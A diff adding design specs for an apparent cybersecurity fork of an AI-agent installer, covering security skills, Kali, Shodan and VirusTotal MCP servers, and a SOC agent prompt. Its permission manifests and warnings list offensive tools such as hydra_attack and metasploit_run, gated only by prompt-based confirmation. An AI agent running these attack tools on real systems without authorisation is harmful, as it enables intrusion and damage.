+| `red-team` | owasp-security-best-practices | p1 |
+| `blue-team` | python-security (promoted from blue-team) | already p0 |
+
+**Go code impact**: Each new skill adds ~3 lines to `internal/model/types.go` (SkillID const) + 1 line to `internal/catalog/skills.go` (Skill struct entry). 11 new skills = ~33 lines in types.go, 11 lines in skills.go. Minimal.
+
+### 4. MCP Integration
+
+**v1 bundles 3 MCP servers:**
+
+| MCP | Type | Config | Security Notes |
+|-----|------|--------|----------------|
+| kali-mcp | system (external Kali) | Requires `kali-server-mcp` running on a Kali Linux host; MCP client bridges via stdio or SSH | All kali-mcp tools are **destructive** — subject to permission gates |
+| shodan-mcp | npx | `npx -y @modelcontextprotocol/server-shodan` | Read-only API queries; no permission gate needed |
+| virustotal-mcp | npx | `npx -y @modelcontextprotocol/server-virustotal` | Read-only API queries; no permission gate needed |
+
+**Implementation**: Follow gentle-ai's existing pattern from `internal/components/mcp/context7.go`. Each MCP server gets:
+- A `manifest.json` in `mcps/{name}/manifest.json` (adapted from glitch-ai-toolkit)
+- A Go file in `internal/components/mcp/{name}.go` with overlay JSON per agent strategy
+- Injection logic in `internal/components/mcp/inject.go` extended to handle cyber MCPs
+
+**Prowler MCP**: Not bundled. The installer checks if `prowler-mcp` is installed (PyPI package `prowler-mcp`) and offers to configure it as an MCP server. If not found, it's skipped with a note. This avoids bundling 2.7MB of Prowler checks.
+
+### 5. Permissions Model
+
+**Approach: Opt-in destructive-tool allow-list with confirmation gates.**
+
+The kali-mcp server provides tools like `nmap_scan`, `sqlmap_scan`, `hydra_attack`, `metasploit_run`. These can cause real damage on production systems.
+
+**Design:**
+
+```go
+// internal/model/types.go — new types
+
+type PermissionTier string
+
+const (
+    PermissionTierUnrestricted PermissionTier = "unrestricted" // shodan, virustotal, context7, engram
+    PermissionTierDestructive  PermissionTier = "destructive"  // kali-mcp tools, metasploit
+    PermissionTierRestricted   PermissionTier = "restricted"   // future: deletes, resets
+)
+
+type ToolPermission struct {
+    MCPServer string          // e.g., "kali-mcp"
+    Tools     []string        // e.g., ["nmap_scan", "sqlmap_scan", "hydra_attack"]
+    Tier      PermissionTier
+}
+```
+
+**Runtime behavior (in agents, not in the installer):**
+1. Each MCP tool is tagged as `unrestricted` or `destructive` in a manifest
+2. When the installer writes agent config, destructive MCP servers include a `/**_WARNING**` comment in the JSON listing the dangerous tools
+3. Agent system prompts (injected by gentle-ai-cyber) include a block: "Before executing any tool marked DESTRUCTIVE, confirm with the user. Never auto-invoke nmap, sqlmap, hydra, or metasploit without explicit human approval."
+4. This is a **soft gate** — it relies on agent prompt compliance, not a hard runtime block. A hard gate (requiring a Go-side proxy that intercepts MCP calls) is v2 scope.
+
+**Manifest addition:**
+
+```json
+{
+  "name": "kali-mcp",
+  "permission_tier": "destructive",
+  "destructive_tools": ["nmap_scan", "sqlmap_scan", "hydra_attack", "metasploit_run", "nikto_scan", "dirb_scan", "gobuster_scan", "wpscan_analyze", "john_crack", "enum4linux_scan"],
+  "confirmation_required": true
+}
+```
+
+### 6. Prowler Integration Depth
+
+**Recommendation: External MCP reference. No bundling of Prowler checks.**
+
+| Option | Pros | Cons | Decision |
+|--------|------|------|----------|
+| Bundle full SDK | Full offline capability | +2.7MB, stale within weeks, Python dependency | Rejected |
+| Bundle metadata JSON only | Smaller, check metadata available | Still ~1.5MB, parsing complexity, no ability to run checks | Rejected |
+| Reference external MCP | Zero bloat, always current, Prowler team maintains | Requires Prowler installed separately | **Accepted v1** |
+
+**Implementation**: The TUI detects if `prowler-mcp` is available on PATH. If yes, it configures it as an MCP server for all agents. If no, it shows: "Prowler MCP not detected. Install with: `pip install prowler-mcp` or skip." The user can proceed without it.
+
+v2: Add a `gentle-ai-cyber sync prowler` CLI command that pulls the latest Prowler check list and generates a static reference markdown for compliance skill use.
+
+### 7. BDD/TDD Harness for Cyber
+
+Testing strategy for cybersecurity edition:
+
+**Three test categories:**
+
+| Category | What | How |
+|----------|------|-----|
+| **Validation Pipeline** | Security skills produce non-hallucinated results | Skill SKILL.md includes `## Validation` section with expected output patterns; tests verify skill content parses and declares validation rules |
+| **Compliance Mapping** | Prowler checks referenced by skill IDs actually exist | If prowler-mcp is available, integration test runs `prowler_hub_list_checks` and verifies referenced check IDs; if not available, test is skipped |
+| **Skill Behavior** | Each skill frontmatter has required fields, trigger matches expected format | Unit tests in `internal/catalog/skills_test.go` extended to validate cyber skill entries |
+
+**Concrete tests:**
+
+```go
+// internal/catalog/cyber_skills_test.go
+
+func TestCyberSkillsHaveRequiredFrontmatter(t *testing.T) {
+    // Every cyber skill SKILL.md must have: name, description, license, metadata.version
+}
+
+func TestDestructiveToolsRequireConfirmation(t *testing.T) {
+    // Every MCP manifest with permission_tier=destructive must list destructive_tools
+}
+
+func TestCyberSkillCategoriesAreValid(t *testing.T) {
+    // Category must be one of: red-team, blue-team, soc, compliance
+}
+```
+
+**"Passing" definition:**
+- All cyber skill SKILL.md files parse with valid frontmatter
+- All cyber skill entries appear in `MVPCyberSkills()` catalog
+- All destructive-tool manifests declare `permission_tier: destructive`
+- No skill references a Prowler check ID format that doesn't match the regex `^[a-z0-9_]+$`
+
+### 8. Agent Additions
+
+**gentleman-soc** is the only new agent in v1.
+
+It's NOT a new `AgentID` (which would require adding a new agent adapter). Instead, it's an **agent definition file** (`agents/gentleman-soc.md`) that gets installed as a system prompt augmentation for existing agents that opt into the cyber preset.
+
+The gentleman-soc definition:
+- Is a 583-line markdown file with PICERL pipeline, MITRE ATT&CK mapping, quality gates
+- Gets injected into the agent's system prompt (following the `StrategyMarkdownSections` pattern already used by Claude Code)
+- Knows WHEN to load each cyber skill (Phase 0→5 pipeline)
+- Does NOT replace the existing agent; it augments it
+
+**Implementation**: Add `gentleman-soc.md` to `agents/` directory. The installer copies it to the agent's config directory (e.g., `~/.claude/gentleman-soc.md`) and injects a reference in the system prompt. The skill-loading instructions reference `~/.claude/skills/{name}/SKILL.md` as they do in gentle-ai.
+
+**Future agents** (v2 considerations):
+- `pentest-orchestrator` — already exists as a skill; could become an agent definition in v2 if demand exists
+- `compliance-auditor` — would orchestrate Prowler checks; requires prowler-mcp integration depth that v1 doesn't have
+
+### 9. Installer Strategy
+
+**Approach: Cybersecurity preset in the existing TUI.**
+
+The gentle-ai TUI currently has 4 presets: `full-gentleman`, `ecosystem-only`, `minimal`, `custom`. We add `PresetCyber`:
+
+```go
+// internal/model/types.go
+PresetCyber PresetID = "cyber"
+```
+
+**Preset definition:**
+```
+cyber = full-gentleman + 11 cyber skills + 3 cyber MCPs + gentleman-soc agent + destructive-tool warnings
+```
+
+The TUI flow:
+1. User selects "cyber" preset OR runs `gentle-ai-cyber --cyber`
+2. TUI shows: "Cybersecurity Edition: Installs SOC/malware analysis skills, pentest orchestration, offensive security tools, and Prowler compliance integration. ⚠ Destructive tools require manual confirmation."
+3. Standard gentle-ai flow continues with cyber additions
+4. At the MCP step, kali-mcp, shodan-mcp, virustotal-mcp are added
+5. At the skill step, all 11 cyber skills are added
+6. System prompt includes gentleman-soc context and destructive-tool warnings
+
+**CLI flag**: `gentle-ai-cyber --cyber` is shorthand for `--preset=cyber`.
+
+**Binary distribution**: Built from the same codebase with a build tag (`-tags=cyber`) that swaps the default preset list to include the cyber option. Alternatively, both presets live in the same binary and the cyber one is gated behind a feature flag. The simplest approach: **same binary, cyber preset always available**, selected via TUI or `--cyber` flag.
+
+### 10. Maintenance & Sync
+
+**Keeping Prowler checks current:**
+
+v1: Manual process. Documentation includes:
+```bash
+# Update Prowler check reference
+pip install --upgrade prowler
+prowler-mcp --list-checks > docs/prowler-checks-reference.md
+```
+
+v2: Automated sync command:
+```bash
+gentle-ai-cyber sync prowler
+# Downloads latest check metadata from Prowler PyPI package
+# Updates local reference markdown
+# Validates all skill check ID references
+```
+
+**Keeping glitch-ai-toolkit skills current:**
+
+gentle-ai-cyber forks the skill content from glitch-ai-toolkit. Maintenance strategy:
+1. Skills are **copied** (not symlinked) into `skills/{name}/SKILL.md`
+2. Each skill gets gentle-ai frontmatter added (name, description, license, metadata)
+3. A `scripts/sync-glitch-skills.sh` script can pull upstream changes from glitch-ai-toolkit
+4. CI checks that skill frontmatter is valid after any sync
+
+**Upstream sync with gentle-ai:**
+
+The fork should rebase on gentle-ai releases, not cherry-pick. Release process:
+1. gentle-ai tags a release (e.g., v2.3.0)
+2. gentle-ai-cyber rebases its cyber additions on top
+3. Conflicts are minimal since cyber additions are in separate files (catalog additions, skill directories, MCP configs)
+
+## Affected Areas
+
+| Area | Impact | Description |
+|------|--------|-------------|
+| `internal/model/types.go` | Modified | Add 11 SkillID constants, PermissionTier type, ToolPermission type, PresetCyber |
+| `internal/catalog/skills.go` | Modified | Add 11 cyber skill entries, MVPCyberSkills() function |
+| `internal/catalog/skills_test.go` | Modified | Add cyber skill validation tests |
+| `internal/catalog/agents.go` | Modified | No change — gentleman-soc is not a new AgentID |
+| `internal/tui/screens/preset.go` | Modified | Add PresetCyber option with description |
+| `internal/tui/screens/skill_picker.go` | Modified | Show cyber skills when cyber preset selected |
+| `internal/components/mcp/` | Modified | Add kali_mcp.go, shodan_mcp.go, virustotal_mcp.go with overlay JSON |
+| `internal/components/mcp/inject.go` | Modified | Handle cyber MCP injection per agent strategy |
+| `skills/` | New | 11 new skill directories with SKILL.md files |
+| `mcps/` | New | 3 MCP manifest directories (kali-mcp, shodan-mcp, virustotal-mcp) |
+| `agents/gentleman-soc.md` | New | SOC orchestrator agent definition |
+| `internal/catalog/cyber_skills_test.go` | New | Validation and compliance mapping tests |
+| `cmd/gentle-ai-cyber/main.go` | Modified | Add --cyber flag (or build from same cmd/) |
+| `AGENTS.md` | Modified | Add cybersecurity skill index section |
+| `docs/` | New | Permission model docs, cyber preset docs, Prowler setup guide |
+
+## Risks
+
+| Risk | Likelihood | Mitigation |
+|------|------------|------------|
+| kali-mcp tools cause real damage | High (if misused) | Destructive-tool permission tier with agent prompt warnings; documented disclaimers; opt-in installation |
+| Skill content drifts from glitch-ai-toolkit upstream | Medium | sync script + CI validation; copied content is stable text, not generated |
+| Prowler MCP API changes break integration | Low | Prowler MCP is separate package with its own versioning; v1 only configures it, doesn't embed |
+| Gentle-ai upstream changes conflict with fork | Medium | Rebase strategy; cyber additions are additive (separate files) minimizing conflict surface |
+| Agent ignores destructive-tool confirmation prompt | Medium | v1 is soft gate; v2 can add hard proxy. Document that the gate is prompt-based |
+| 11 new skills bloat binary size | Low | Skills are markdown files copied at install time, not compiled into binary. Binary size impact: ~0 |
+| TUI becomes crowded with preset options | Low | 5 presets is manageable; cyber preset has distinct description |
+
+## Rollback Plan
+
+1. Remove `PresetCyber` from preset list and `--cyber` CLI flag
+2. Delete `skills/{red-team,blue-team,soc}/` directories
+3. Delete `mcps/{kali-mcp,shodan-mcp,virustotal-mcp}/` directories
+4. Revert `internal/model/types.go` to remove cyber SkillIDs and PermissionTier
+5. Revert `internal/catalog/skills.go` to remove cyber entries
+6. Delete `agents/gentleman-soc.md`
+7. Delete `internal/catalog/cyber_skills_test.go`
+8. Remove `internal/components/mcp/{kali_mcp,shodan_mcp,virustotal_mcp}.go`
+
+All additions are additive. Rollback = delete the added files and revert the modified Go files to the upstream gentle-ai state.
+
+## Dependencies
+
+- glitch-ai-toolkit: source for security skills and MCP configs (commit-pinned)
+- Prowler MCP: optional external dependency (pip package `prowler-mcp`)
+- kali-mcp: requires a Kali Linux host running `kali-server-mcp` (documented setup guide)
+- shodan-mcp: requires `SHODAN_API_KEY` env var
+- virustotal-mcp: requires `VIRUSTOTAL_API_KEY` env var
+
+## Success Criteria
+
+- [ ] `go build ./cmd/gentle-ai-cyber` compiles without errors
+- [ ] `go test ./internal/catalog/...` passes with cyber skill validation tests
+- [ ] `PresetCyber` appears in the TUI preset selection and selects 11 cyber skills + 3 MCPs
+- [ ] `--cyber` CLI flag selects the cyber preset
+- [ ] All 11 cyber skill SKILL.md files have valid frontmatter (name, description, license, metadata.version)
+- [ ] kali-mcp manifest declares `permission_tier: destructive` with 10 destructive tools listed
+- [ ] shodan-mcp and virustotal-mcp manifests declare `permission_tier: unrestricted`
+- [ ] Agent system prompt for cyber installations includes destructive-tool confirmation instructions
+- [ ] Prowler MCP auto-detection works: skips gracefully if not installed, configures if available
+- [ ] `gentleman-soc.md` is valid markdown that references the 6 SOC skills by correct path
+- [ ] Rollback procedure succeeds: deleting cyber additions yields a clean gentle-ai build
+- [ ] All existing gentle-ai tests continue to pass (no regressions)

--- a/openspec/changes/archive/2026-05-20-gentle-ai-cybersecurity-fork/specs/cyber-agent/spec.md
+++ b/openspec/changes/archive/2026-05-20-gentle-ai-cybersecurity-fork/specs/cyber-agent/spec.md
@@ -1,0 +1,131 @@
+# Cybersecurity Agent Definition Specification
+
+## Purpose
+
+Defines the `gentleman-soc.md` agent definition file: its content requirements, injection strategy, skill references, and relationship to existing agent identities.
+
+## Requirements
+
+### Requirement: Gentleman-Soc Agent Definition File
+
+The system MUST include a valid Markdown file at `agents/gentleman-soc.md` that defines the SOC orchestrator agent. This file SHALL be embedded as a Go asset and installed into the agent's configuration directory when the cyber preset is selected.
+
+#### Scenario: Gentleman-soc file exists and is valid markdown
+
+- GIVEN the cybersecurity fork repository
+- WHEN `agents/gentleman-soc.md` is read
+- THEN the file exists
+- AND it contains valid markdown content with at least one markdown heading
+
+#### Scenario: Gentleman-soc file is embedded as a Go asset
+
+- GIVEN the codebase is compiled
+- WHEN the `internal/assets/` package is inspected
+- THEN `gentleman-soc.md` is accessible as an embedded asset
+- AND `go:embed` directive references it correctly
+
+---
+
+### Requirement: PICERL Pipeline Structure
+
+The gentleman-soc definition MUST describe a structured incident response pipeline using a phase-based framework. The pipeline SHALL cover at minimum: Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned (PICERL or equivalent).
+
+#### Scenario: Pipeline phases are documented
+
+- GIVEN the `agents/gentleman-soc.md` content
+- WHEN the content is searched for pipeline phase names
+- THEN at least 5 distinct phases are defined
+- AND each phase maps to one or more cybersecurity skills from the catalog
+
+#### Scenario: Each phase references specific skills
+
+- GIVEN the gentleman-soc definition
+- WHEN the pipeline section is examined
+- THEN for each phase, at least one skill from the `soc` category is referenced by name
+- AND referenced skill names match their catalog `Name` field (e.g., `malware-triage`, not `malware_triage`)
+
+---
+
+### Requirement: Skill Loading Instructions
+
+The gentleman-soc definition MUST include instructions for WHEN to load each of the 6 SOC skills (`malware-triage`, `specialized-file-analyzer`, `malware-dynamic-analysis`, `malware-report-writer`, `detection-engineer`, `python-security`). The loading triggers SHALL align with the PICERL pipeline phases.
+
+#### Scenario: All 6 SOC skills are referenced with loading conditions
+
+- GIVEN `agents/gentleman-soc.md`
+- WHEN all skill references are counted
+- THEN all 6 SOC/blue-team skills are referenced by name
+- AND each reference includes a trigger condition (e.g., "when user uploads a suspicious file")
+
+#### Scenario: Skill references use correct file paths
+
+- GIVEN the gentleman-soc definition
+- WHEN skill file paths are mentioned
+- THEN paths follow the pattern `skills/{name}/SKILL.md` (gentle-ai convention)
+- AND no paths reference `~/.claude/` or any agent-specific prefix (the installer handles path resolution)
+
+---
+
+### Requirement: MITRE ATT&CK Mapping
+
+The gentleman-soc definition SHOULD include a mapping from incident response phases to relevant MITRE ATT&CK tactics or techniques, providing analysts with a framework for threat classification.
+
+#### Scenario: MITRE ATT&CK references are present
+
+- GIVEN `agents/gentleman-soc.md`
+- WHEN the content is searched for MITRE ATT&CK terminology
+- THEN at least one MITRE ATT&CK tactic (e.g., `Initial Access`, `Execution`, `Exfiltration`) is referenced
+- OR a dedicated MITRE ATT&CK mapping section exists
+
+---
+
+### Requirement: Quality Gates
+
+The gentleman-soc definition MUST define quality gates — conditions that MUST be satisfied before moving from one pipeline phase to the next. Each gate SHALL be testable (verifiable by a human or automated check).
+
+#### Scenario: Quality gates are defined between phases
+
+- GIVEN the gentleman-soc pipeline structure
+- WHEN the transition between any two consecutive phases is examined
+- THEN at least one quality gate condition is described
+- AND the condition is expressed as a checkable statement (not vague prose)
+
+#### Scenario: Quality gates are not implementation instructions
+
+- GIVEN any quality gate definition
+- WHEN the text is examined
+- THEN it describes WHAT must be verified, not HOW to verify it in code
+- AND it does not reference specific APIs, tools, or programming languages
+
+---
+
+### Requirement: Agent Identity
+
+The gentleman-soc definition MUST NOT create a new `AgentID`. It SHALL be an agent augmentation injected via the `StrategyMarkdownSections` or equivalent strategy, not a standalone agent adapter.
+
+#### Scenario: No new AgentID constant for gentleman-soc
+
+- GIVEN `internal/model/types.go`
+- WHEN the `AgentID` constants are examined
+- THEN no constant named `AgentSOC` or `AgentGentlemanSOC` exists
+- AND the total number of AgentID constants matches the gentle-ai upstream count
+
+#### Scenario: Gentleman-soc injects as markdown sections
+
+- GIVEN the cyber preset is installed for an agent using `StrategyMarkdownSections` (e.g., Claude Code)
+- WHEN the system prompt file is generated
+- THEN gentleman-soc content appears as a markdown section delimited by `<!-- gentle-ai:gentleman-soc -->` markers
+- AND it augments, not replaces, the existing agent persona
+
+---
+
+### Requirement: Cross-Agent Availability
+
+The gentleman-soc definition MUST be available to all 13 agents supported by gentle-ai. It SHALL NOT be restricted to a specific agent or agent class.
+
+#### Scenario: Cyber preset installs gentleman-soc for all selected agents
+
+- GIVEN the cyber preset is installed with multiple agents selected
+- WHEN the installation completes
+- THEN gentleman-soc content is present in each agent's configuration directory
+- AND the content is identical across agents (no agent-specific variations)

--- a/openspec/changes/archive/2026-05-20-gentle-ai-cybersecurity-fork/specs/cyber-installer/spec.md
+++ b/openspec/changes/archive/2026-05-20-gentle-ai-cybersecurity-fork/specs/cyber-installer/spec.md
@@ -1,0 +1,149 @@
+# Cybersecurity Installer Specification
+
+## Purpose
+
+Defines the `PresetCyber` preset in the TUI installer, the `--cyber` CLI flag, and the cybersecurity edition's behavior during installation — including skill selection, MCP configuration, and agent augmentation.
+
+## Requirements
+
+### Requirement: PresetCyber Constant
+
+The system MUST define a `PresetCyber` constant of type `PresetID` with value `"cyber"` in `internal/model/types.go`. It SHALL be added alongside existing presets without removing or altering them.
+
+#### Scenario: PresetCyber is defined
+
+- GIVEN the codebase is compiled
+- WHEN `model.PresetCyber` is referenced
+- THEN its value is the string `"cyber"`
+
+#### Scenario: Existing presets are unchanged
+
+- GIVEN the fork is built
+- WHEN the `PresetOptions()` function returns available presets
+- THEN `full-gentleman`, `ecosystem-only`, `minimal`, and `custom` are all present
+- AND `cyber` is also present
+
+---
+
+### Requirement: TUI Preset Selection
+
+The TUI preset selection screen MUST display `PresetCyber` as a selectable option. The description SHALL clearly indicate it is the cybersecurity edition and SHALL mention that destructive tools require manual confirmation.
+
+#### Scenario: Cyber preset appears in TUI preset list
+
+- GIVEN the TUI is launched
+- WHEN the preset selection screen is displayed
+- THEN "cyber" is listed as one of the selectable presets
+- AND the description includes the text "Cybersecurity Edition"
+- AND the description includes a warning about destructive tool confirmation
+
+#### Scenario: Cyber preset description is distinct from other presets
+
+- GIVEN the TUI preset screen is rendered
+- WHEN comparing the cyber preset description to other presets
+- THEN the cyber description is unique (not identical to full-gentleman, ecosystem-only, minimal, or custom)
+
+#### Scenario: User can navigate to and select cyber preset
+
+- GIVEN the TUI is on the preset selection screen
+- WHEN the user navigates to the cyber preset and presses enter/select
+- THEN `m.Selection.Preset` is set to `model.PresetCyber`
+- AND the installer proceeds to the next screen
+
+---
+
+### Requirement: Cyber Preset Composition
+
+Selecting `PresetCyber` MUST configure the following components compared to `PresetFullGentleman`:
+- All full-gentleman components (Engram, SDD, persona, existing skills, docs)
+- PLUS all 11 cybersecurity skills
+- PLUS kali-mcp, shodan-mcp, and virustotal-mcp (with kali-mcp requiring explicit opt-in)
+- PLUS gentleman-soc agent augmentation
+- PLUS destructive-tool warning blocks in agent prompts
+
+#### Scenario: Cyber preset includes full-gentleman base
+
+- GIVEN `PresetCyber` is selected
+- WHEN the installer resolves component dependencies
+- THEN all components from `PresetFullGentleman` are included
+- AND no full-gentleman component is removed
+
+#### Scenario: Cyber preset adds 11 security skills
+
+- GIVEN `PresetCyber` is selected
+- WHEN the skill selection step computes the skill list
+- THEN all 11 cybersecurity skills are present in the plan
+- AND they are grouped under their respective categories (red-team, blue-team, soc)
+
+#### Scenario: Cyber preset adds 3 MCP servers
+
+- GIVEN `PresetCyber` is selected
+- WHEN the MCP configuration step runs
+- THEN shodan-mcp and virustotal-mcp are enabled by default
+- AND kali-mcp is offered with a destructive capability warning and requires explicit opt-in
+
+---
+
+### Requirement: --cyber CLI Flag
+
+The binary MUST accept a `--cyber` CLI flag that sets the active preset to `PresetCyber` at startup, equivalent to `--preset=cyber`.
+
+#### Scenario: --cyber flag selects cyber preset
+
+- GIVEN the binary is invoked with `gentle-ai-cyber --cyber`
+- WHEN the application initializes
+- THEN `Selection.Preset` is set to `model.PresetCyber`
+- AND the TUI starts at the component review screen (skipping preset selection)
+
+#### Scenario: --cyber flag is mutually exclusive with --preset
+
+- GIVEN the binary is invoked with `gentle-ai-cyber --cyber --preset=minimal`
+- WHEN the application initializes
+- THEN an error is returned indicating the flags conflict
+- AND the application exits with a non-zero status code
+
+#### Scenario: --cyber flag is absent in base gentle-ai builds
+
+- GIVEN the base gentle-ai binary (without cyber additions)
+- WHEN `gentle-ai --help` is invoked
+- THEN `--cyber` is NOT listed in the help output
+
+---
+
+### Requirement: Installer Does Not Break Existing Flows
+
+The addition of the cyber preset MUST NOT alter the behavior of existing presets. Selecting `full-gentleman`, `ecosystem-only`, `minimal`, or `custom` MUST produce identical results to upstream gentle-ai.
+
+#### Scenario: Full-gentleman preset unchanged
+
+- GIVEN `PresetFullGentleman` is selected in the forked binary
+- WHEN installation completes
+- THEN the installed components match exactly what upstream gentle-ai would install for `full-gentleman`
+- AND no cybersecurity skills, MCPs, or prompt warnings are installed
+
+#### Scenario: Custom preset retains full manual selection capability
+
+- GIVEN `PresetCustom` is selected in the forked binary
+- WHEN the user manually selects components
+- THEN cybersecurity skills and MCPs are available for manual selection
+- AND destructive tool warnings are injected only if kali-mcp is manually enabled
+
+---
+
+### Requirement: Binary Identity
+
+The forked binary SHALL be named `gentle-ai-cyber`. The Go module path SHALL be `github.com/rortizs/gentle-ai-cyber`. The binary description SHALL reference "cybersecurity edition".
+
+#### Scenario: Binary compiles with correct name
+
+- GIVEN the fork repository is checked out
+- WHEN `go build ./cmd/gentle-ai-cyber` is executed
+- THEN compilation succeeds without errors
+- AND the output binary is named `gentle-ai-cyber`
+
+#### Scenario: Go module path is set to fork identity
+
+- GIVEN `go.mod` is read
+- WHEN the module declaration is inspected
+- THEN the module path is `github.com/rortizs/gentle-ai-cyber`
+- AND it is different from `github.com/gentleman-programming/gentle-ai`

--- a/openspec/changes/archive/2026-05-20-gentle-ai-cybersecurity-fork/specs/cyber-mcp/spec.md
+++ b/openspec/changes/archive/2026-05-20-gentle-ai-cybersecurity-fork/specs/cyber-mcp/spec.md
@@ -1,0 +1,127 @@
+# Cybersecurity MCP Configuration Specification
+
+## Purpose
+
+Defines the 3 MCP servers bundled in v1 (kali-mcp, shodan-mcp, virustotal-mcp), their manifest format, permission tier declarations, and injection strategy into agent configurations.
+
+## Requirements
+
+### Requirement: MCP Server Manifest Files
+
+Each cybersecurity MCP server MUST have a `manifest.json` file at `mcps/{server-name}/manifest.json` containing at minimum: `name`, `type`, `config`, `permission_tier`, and `description`.
+
+The `permission_tier` field SHALL be one of: `unrestricted`, `destructive`, or `restricted`.
+
+#### Scenario: All 3 MCP manifests exist with required fields
+
+- GIVEN the cybersecurity fork is built
+- WHEN MCP manifests are loaded from `mcps/`
+- THEN `kali-mcp/manifest.json`, `shodan-mcp/manifest.json`, and `virustotal-mcp/manifest.json` all exist
+- AND each manifest contains `name`, `type`, `config`, `permission_tier`, and `description` fields
+
+#### Scenario: Manifests are valid JSON
+
+- GIVEN any cybersecurity MCP manifest file
+- WHEN the file is parsed as JSON
+- THEN parsing succeeds without error
+- AND the root object contains all required top-level keys
+
+---
+
+### Requirement: MCP Permission Tier Classification
+
+The kali-mcp server MUST declare `permission_tier: destructive`. Shodan-mcp and virustotal-mcp MUST declare `permission_tier: unrestricted`.
+
+#### Scenario: Kali-mcp is classified as destructive
+
+- GIVEN the kali-mcp manifest
+- WHEN the `permission_tier` field is read
+- THEN its value is `"destructive"`
+
+#### Scenario: Shodan-mcp is classified as unrestricted
+
+- GIVEN the shodan-mcp manifest
+- WHEN the `permission_tier` field is read
+- THEN its value is `"unrestricted"`
+
+#### Scenario: Virustotal-mcp is classified as unrestricted
+
+- GIVEN the virustotal-mcp manifest
+- WHEN the `permission_tier` field is read
+- THEN its value is `"unrestricted"`
+
+---
+
+### Requirement: Destructive Tool Listing
+
+For any MCP manifest with `permission_tier: destructive`, the manifest MUST include a `destructive_tools` array listing every tool that requires user confirmation before execution.
+
+#### Scenario: Kali-mcp lists all destructive tools
+
+- GIVEN the kali-mcp manifest with `permission_tier: destructive`
+- WHEN the `destructive_tools` field is read
+- THEN the array contains at minimum: `nmap_scan`, `sqlmap_scan`, `hydra_attack`, `metasploit_run`
+- AND each tool name matches an actual tool provided by the kali-mcp server
+
+#### Scenario: Unrestricted manifests have no destructive_tools array
+
+- GIVEN the shodan-mcp manifest with `permission_tier: unrestricted`
+- WHEN the `destructive_tools` field is read
+- THEN it is either absent or an empty array
+
+#### Scenario: Unrestricted manifests must not list tools as destructive
+
+- GIVEN the virustotal-mcp manifest with `permission_tier: unrestricted`
+- WHEN the `destructive_tools` field is examined (if present)
+- THEN it is empty
+- OR the field is absent entirely
+
+---
+
+### Requirement: MCP Injection Strategy
+
+Each cybersecurity MCP server MUST follow the existing agent-specific MCP injection pattern: a Go file at `internal/components/mcp/{server-name}.go` that provides overlay JSON per agent strategy, wired through `internal/components/mcp/inject.go`.
+
+#### Scenario: Cyber MCP injection files exist
+
+- GIVEN the fork is compiled
+- WHEN the `internal/components/mcp/` package is inspected
+- THEN `kali_mcp.go`, `shodan_mcp.go`, and `virustotal_mcp.go` exist
+- AND each file exports overlay JSON for at least the `StrategySeparateMCPFiles` strategy
+
+#### Scenario: Inject handles cyber MCPs alongside existing MCPs
+
+- GIVEN the cyber preset is selected
+- WHEN MCP injection runs
+- THEN context7 and engram MCPs are injected as normal
+- AND kali-mcp, shodan-mcp, and virustotal-mcp are injected for all agents in the preset
+
+---
+
+### Requirement: Prowler MCP External Detection
+
+The installer MUST detect whether `prowler-mcp` is available on the system PATH. If found, it SHALL offer to configure it as an MCP server. If not found, it SHALL inform the user and continue without error.
+
+The prowler-mcp SHALL NOT be bundled or embedded in the binary.
+
+#### Scenario: Prowler-mcp detected on PATH
+
+- GIVEN `prowler-mcp` is installed and available on PATH
+- WHEN the installer reaches the MCP configuration step
+- THEN the user is offered to include prowler-mcp in the configuration
+- AND the installer shows the command that was used to detect it
+
+#### Scenario: Prowler-mcp not detected on PATH
+
+- GIVEN `prowler-mcp` is NOT installed
+- WHEN the installer reaches the MCP configuration step
+- THEN a message informs the user: "Prowler MCP not detected. Install with: `pip install prowler-mcp` or skip."
+- AND installation continues without error
+- AND prowler-mcp is NOT configured
+
+#### Scenario: Prowler-mcp detection failure does not block installation
+
+- GIVEN PATH lookup for `prowler-mcp` fails for any reason (e.g., permission error)
+- WHEN the installer attempts detection
+- THEN it treats the result as "not found" and continues
+- AND a diagnostic message is logged for debugging

--- a/openspec/changes/archive/2026-05-20-gentle-ai-cybersecurity-fork/specs/cyber-permissions/spec.md
+++ b/openspec/changes/archive/2026-05-20-gentle-ai-cybersecurity-fork/specs/cyber-permissions/spec.md
@@ -1,0 +1,134 @@
+# Cybersecurity Permission Model Specification
+
+## Purpose
+
+Defines the soft-gate permission model for destructive cybersecurity tools: how tools are classified, what warnings agents receive, and how the confirmation flow works in the generated agent system prompts.
+
+## Requirements
+
+### Requirement: Permission Tier Type Definitions
+
+The system MUST define a `PermissionTier` string type with exactly three constant values: `unrestricted`, `destructive`, and `restricted`. It SHALL also define a `ToolPermission` struct containing `MCPServer`, `Tools`, and `Tier` fields.
+
+#### Scenario: PermissionTier constants are defined
+
+- GIVEN the `internal/model/types.go` file is compiled
+- WHEN the `PermissionTier` type is inspected
+- THEN `PermissionTierUnrestricted` has value `"unrestricted"`
+- AND `PermissionTierDestructive` has value `"destructive"`
+- AND `PermissionTierRestricted` has value `"restricted"`
+
+#### Scenario: ToolPermission struct is defined
+
+- GIVEN the codebase is compiled
+- WHEN the `ToolPermission` type is inspected
+- THEN it has fields `MCPServer string`, `Tools []string`, and `Tier PermissionTier`
+
+---
+
+### Requirement: Destructive Tool Warning in Agent System Prompts
+
+When the cybersecurity preset is selected, the installer MUST inject a destructive-tool warning block into every agent's system prompt. The block SHALL instruct the agent to require explicit human confirmation before invoking any tool tagged as `destructive`.
+
+#### Scenario: Cyber preset injects destructive tool warning
+
+- GIVEN the user selects the `cyber` preset during installation
+- WHEN system prompts are generated for any agent
+- THEN each system prompt includes a block containing the text "Before executing any tool marked DESTRUCTIVE"
+- AND the block instructs the agent to "confirm with the user" before invoking such tools
+
+#### Scenario: Non-cyber presets do not inject destructive warnings
+
+- GIVEN the user selects `full-gentleman`, `ecosystem-only`, `minimal`, or `custom`
+- WHEN system prompts are generated
+- THEN no destructive-tool warning block is present
+- AND existing gentle-ai prompt behavior is unchanged
+
+#### Scenario: Warning block references specific tools from kali-mcp
+
+- GIVEN the destructive tool warning is injected
+- WHEN the block content is examined
+- THEN it mentions at minimum: `nmap_scan`, `sqlmap_scan`, `hydra_attack`, and `metasploit_run` as examples requiring confirmation
+- AND it states these are from the `kali-mcp` server
+
+---
+
+### Requirement: MCP JSON Warning Comments
+
+For agents that use `StrategySeparateMCPFiles`, the generated MCP JSON file for kali-mcp MUST include a `/**_WARNING**` comment at the top listing the destructive tools and requiring manual confirmation.
+
